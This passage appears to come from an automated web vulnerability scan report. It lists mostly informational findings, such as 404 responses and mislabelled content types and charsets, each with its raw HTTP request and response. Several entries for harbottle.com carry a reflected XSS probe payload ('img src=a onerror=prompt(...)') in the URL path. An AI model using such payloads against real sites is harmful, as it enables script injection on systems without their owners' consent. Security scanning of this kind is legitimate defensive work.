Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
   <!-- Google Analytics (V3) MUST IMMEDIATELY FOLLOW OPENING <head> TAG BEFORE GOOGLE WEBSITE OPTIMIZER -->
<script type="text/javascript" src="https://www.bigcommerce.com/js/gascript.js?
...[SNIP]...

29.70. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Request

GET /en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:32 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

29.71. http://www.gillettevenus.com/en_US/images/go_roll.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/images/go_roll.png

Request

GET /en_US/images/go_roll.png HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:46:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

29.72. http://www.gillettevenus.com/global/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /global/blank.html

Request

GET /global/blank.html?bv=t&h=959&w=1266 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Mon, 28 Sep 2009 14:48:47 GMT
ETag: "239af8-69a-474a4652191c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Blank</title>
...[SNIP]...

29.73. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5175
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...

29.74. http://www.harbottle.com/hnl/pages/hnl_search2.php/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/a

Request

GET /hnl/pages/hnl_search2.php/a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5108
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...

29.75. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5134
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...

29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5120
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...

29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /Scripts/AC_RunActiveContent.js

Request

GET /Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

29.78. http://www.rayalab.com/animate.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /animate.js

Request

GET /animate.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

29.79. http://www.rayalab.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=258269193.1974267751.1315345538.1315345538.1315345538.1; __utmb=258269193.1.10.1315345538; __utmc=258269193; __utmz=258269193.1315345538.1.1.utmgclid=CMuoq_OIiasCFRligwodfwxd4w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

29.80. http://www.rayalab.com/flexcroll.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /flexcroll.js

Request

GET /flexcroll.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

29.81. http://www.resourcepoint.net/form.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /form.htm

Request

GET /form.htm?i=Searchkeywordnotfound&abt=xss HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; name=xss

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 30 Jun 2010 21:13:48 GMT
Accept-Ranges: bytes
ETag: "04e6c219918cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:16 GMT
Content-Length: 13435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="images/rp_style.css" type="text/css">
<link rel="stylesheet" href="images/tis_style.css"
...[SNIP]...

29.82. http://www.revsolutionsinc.com/animated_favicon1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revsolutionsinc.com
Path:   /animated_favicon1.gif

Request

GET /animated_favicon1.gif HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:32:55 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /graphic/bullet-sm-w.gif

Request

GET /graphic/bullet-sm-w.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/accelerator2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.21.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A37

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:38:32 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.84. http://www.sophelle.com/images/sophelle-ico.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /images/sophelle-ico.ico

Request

GET /images/sophelle-ico.ico HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.4.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A05

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:19 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

30. HTML uses unrecognised charset

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://account.bigcommerce.com
Path:   /mailer/form.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

charset="UTF-8"

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /mailer/form.php HTTP/1.1
Host: account.bigcommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:05:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13

Invalid Form.

31. Content type incorrectly stated
There are 105 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


31.1. http://4qinvite.4q.iperceptions.com/1.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1.aspx?sdfc=718cce93-25878-118cda1e-598a-49c3-aae3-65f5d780afae&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 16:08:48 GMT
Content-Length: 81

var dm = document.domain;document.cookie='IPE_S_26841=26841;Path=/;domain=' + dm;

31.2. http://a1.interclick.com/getInPageJS.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=13501&cid=1240946772498 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Tue, 06 Sep 2011 20:57:42 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:41 GMT
Content-Length: 6347

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

31.3. http://a1.interclick.com/getInPageJSProcess.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=51&b=13501&cid=1240946757066&isif=t&rurld=search.cnbc.com&sl=true&dvp=http%3A//search.cnbc.com/main.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&rurl=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
